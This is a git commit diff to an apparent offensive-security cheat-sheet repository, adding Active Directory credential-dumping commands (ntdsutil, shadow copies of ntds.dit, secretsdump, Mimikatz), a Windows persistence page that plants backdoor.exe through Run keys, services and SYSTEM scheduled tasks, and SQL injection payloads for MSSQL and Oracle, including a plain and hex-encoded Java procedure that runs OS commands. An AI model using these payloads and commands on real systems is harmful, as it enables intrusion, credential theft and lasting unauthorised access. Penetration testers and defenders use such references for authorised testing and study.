Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL)

georlav · Apr 27, 2018 · cb3b298 · cb3b298
1 parent 8209d32
commit cb3b298
Show file tree

Hide file tree

Showing 6 changed files with 220 additions and 9 deletions.
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
@@ -18,7 +18,7 @@
     ```
   * Unconstrained Delegation (incl. pass-the-ticket)
   * OverPass-the-Hash (Making the most of NTLM password hashes)
-  * Pivoting with Local Admin & Passwords in SYSVOL
+  * GPO - Pivoting with Local Admin & Passwords in SYSVOL
     ```c
     findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
 
@@ -27,9 +27,16 @@
     Metasploit: scanner/smb/smb_enumshares
     Metasploit: windows/gather/enumshares
     Metasploit: windows/gather/credentials/gpp
+
+
+    /!\ GPO Priorization : Organization Unit > Domain > Site > Local
+    List all GPO for a domain :
+    Get-GPO -domaine DOMAIN.COM -all
+    Get-GPOReport -all -reporttype xml --all
     ```
   * Dangerous Built-in Groups Usage
-  * Dumping AD Domain Credentials
+
+  * Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
   ```c
   C:\>ntdsutil
   ntdsutil: activate instance ntds
@@ -38,11 +45,22 @@
   ifm: quit
   ntdsutil: quit
 
+  or
+
+  vssadmin create shadow /for=C :
+  Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
+
+  then you need to use secretsdump to extract the hashes
   secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
 
+
   or
 
   Metasploit : windows/gather/credentials/domain_hashdump
+
+  or
+
+  PowerSploit : Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
   ```
   * Golden Tickets    
   Mimikatz version
@@ -88,13 +106,6 @@
   * RottenPotato
   * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
 
-## Mimikatz
-```
-load mimikatz
-mimikatz_command -f sekurlsa::logonPasswords full
-mimikatz_command -f sekurlsa::wdigest
-```
-
 ## PowerSploit
 ```
 https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md
@@ -14,6 +14,9 @@ PS C:\temp\mimikatz> .\mimikatz
 mimikatz # privilege::debug
 mimikatz # sekurlsa::logonpasswords
 mimikatz # sekurlsa::wdigest
+
+mimikatz_command -f sekurlsa::logonPasswords full
+mimikatz_command -f sekurlsa::wdigest
 ```
 
 Mimikatz Golden ticket

diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
@@ -0,0 +1,58 @@
+# Windows - Persistence
+
+## Userland
+
+### Registry
+Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.
+```
+Value name:  Backdoor
+Value data:  C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
+```
+
+### Startup
+Create a batch script in the user startup folder.
+```
+PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
+start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
+```
+
+### Scheduled Task
+```
+PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
+PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
+PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
+PS C:\> $S = New-ScheduledTaskSettingsSet
+PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
+PS C:\> Register-ScheduledTask Backdoor -InputObject $D
+```
+
+
+## Elevated
+
+### HKLM
+Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
+```
+Value name:  Backdoor
+Value data:  C:\Windows\Temp\backdoor.exe
+```
+
+### Services
+Create a service that will start automatically or on-demand.
+```
+PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
+```
+
+### Scheduled Tasks
+Scheduled Task to run as SYSTEM, everyday at 9am.
+```
+PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
+PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
+PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
+PS C:\> $S = New-ScheduledTaskSettingsSet
+PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
+PS C:\> Register-ScheduledTask Backdoor -InputObject $D
+```
+
+
+## Thanks to
+ * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
diff --git a/SQL injection/MSSQL Injection.md b/SQL injection/MSSQL Injection.md
@@ -20,13 +20,17 @@ SELECT DB_NAME(N); — for N = 0, 1, 2, …
 ```
 SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
 SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
+
+SELECT table_catalog, column_name FROM information_schema.columns
 ```
 
 ## MSSQL List Tables
 ```
 SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
 SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
 SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
+
+SELECT table_catalog, table_name FROM information_schema.columns
 ```
 
 
@@ -44,7 +48,19 @@ SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.
 ## MSSQL Error based
 ```
 For integer inputs : convert(int,@@version)
+For integer inputs : cast((SELECT @@version) as int)
+
 For string inputs   : ' + convert(int,@@version) + '
+For string inputs   : ' + cast((SELECT @@version) as int) + '
+```
+
+
+## MSSQL Blind based
+```
+SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
+
+WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
+SELECT message FROM data WHERE row = 1 and message like 't%'
 ```
 
 ## MSSQL Time based

diff --git a/SQL injection/OracleSQL Injection.md b/SQL injection/OracleSQL Injection.md
@@ -0,0 +1,85 @@
+# Oracle SQL Injection
+
+## Oracle SQL version
+```
+SELECT user FROM dual UNION SELECT * FROM v$version
+```
+
+## Oracle SQL database name
+```
+SELECT global_name FROM global_name;
+SELECT name FROM V$DATABASE;
+SELECT instance_name FROM V$INSTANCE;
+SELECT SYS.DATABASE_NAME FROM DUAL;
+```
+
+## Oracle SQL List Databases
+```
+SELECT DISTINCT owner FROM all_tables;
+```
+
+## Oracle SQL List Column
+```
+SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
+SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
+```
+
+## Oracle SQL List Tables
+```
+SELECT table_name FROM all_tables;
+SELECT owner, table_name FROM all_tables;
+SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
+```
+
+## Oracle SQL Error based
+
+| Description  | Query  |
+| :------------- | :------------- |
+| Invalid HTTP Request  | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual |
+| CTXSYS.DRITHSX.SN     | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual |
+| Invalid XPath         | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
+| Invalid XML           | SELECT to_char(dbms_xmlgen.getxml('select "'&#124;&#124;(select user from sys.dual)&#124;&#124;'" FROM sys.dual')) FROM dual |
+| Invalid XML	          | SELECT rtrim(extract(xmlagg(xmlelement("s", username &#124;&#124; ',')),'/s').getstringval(),',') FROM all_users |
+
+
+## Oracle SQL Blind
+
+| Description | Query |
+| :------------- | :------------- |
+| Version is 12.2	       | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; |
+| Subselect is enabled	 | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) |
+| Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); |
+| Column message exists in table log_table | SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
+| First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
+
+
+
+## Oracle SQL Command execution
+```
+/* create Java class */
+BEGIN
+EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
+END;
+/
+
+BEGIN
+EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
+END;
+/
+
+/* run OS command */
+SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
+```
+or (hex encoded)
+
+```
+/* create Java class */
+SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
+EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual
+
+/* run OS command */
+SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
+```
+
+## Thanks to
+ * [Heavily taken inspired by - NetSpi SQL Wiki ](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
diff --git a/SQL injection/README.md b/SQL injection/README.md
@@ -34,6 +34,14 @@ Merging characters
 '%2B'HERP
 ```
 
+Logic Testing
+```
+page.asp?id=1 or 1=1 -- true
+page.asp?id=1' or 1=1 -- true
+page.asp?id=1" or 1=1 -- true
+page.asp?id=1 and 1=2 -- false
+```
+
 Weird characters
 ```
 Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
@@ -42,6 +50,35 @@ Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
 transformed into U+0027 APOSTROPHE (')
 ```
 
+## DBMS Identification
+```
+["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
+["connection_id()=connection_id()"                 ,"MYSQL"],
+["crc32('MySQL')=crc32('MySQL')"                   ,"MYSQL"],
+["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)"       ,"MSSQL"],
+["@@CONNECTIONS>0"                                 ,"MSSQL"],
+["@@CONNECTIONS=@@CONNECTIONS"                     ,"MSSQL"],
+["@@CPU_BUSY=@@CPU_BUSY"                           ,"MSSQL"],
+["USER_ID(1)=USER_ID(1)"                           ,"MSSQL"],
+["ROWNUM=ROWNUM"                                   ,"ORACLE"],
+["RAWTOHEX('AB')=RAWTOHEX('AB')"                   ,"ORACLE"],
+["LNNVL(0=123)"                                    ,"ORACLE"],
+["5::int=5"                                        ,"POSTGRESQL"],
+["5::integer=5"                                    ,"POSTGRESQL"],
+["pg_client_encoding()=pg_client_encoding()"       ,"POSTGRESQL"],
+["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
+["quote_literal(42.5)=quote_literal(42.5)"         ,"POSTGRESQL"],
+["current_database()=current_database()"           ,"POSTGRESQL"],
+["sqlite_version()=sqlite_version()"               ,"SQLITE"],
+["last_insert_rowid()>1"                           ,"SQLITE"],
+["last_insert_rowid()=last_insert_rowid()"         ,"SQLITE"],
+["val(cvar(1))=1"                                  ,"MSACCESS"],
+["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0"               ,"MSACCESS"],
+["cdbl(1)=cdbl(1)"                                 ,"MSACCESS"],
+["1337=1337",   "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
+["'i'='i'",     "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
+```
+
 
 ## SQL injection using SQLmap
 Basic arguments for SQLmap
@@ -349,6 +386,7 @@ mysql> mysql> select version();
 ## Thanks to - Other resources
 * Detect SQLi
   - [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
+  - [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
 * MySQL:
   - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
   - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)